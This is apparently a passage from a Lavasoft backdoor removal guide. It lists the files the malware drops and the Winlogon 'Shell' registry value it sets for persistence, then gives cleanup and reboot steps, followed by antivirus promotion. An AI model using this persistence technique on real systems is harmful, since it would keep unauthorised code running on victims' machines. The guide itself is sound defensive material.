    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49MV0TMF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
    %Program Files%\LP\B375\1.exe (263 bytes)
    %Program Files%\LP\B375\2.exe (264 bytes)
    

    4. 

  4. Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\8A8B3.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now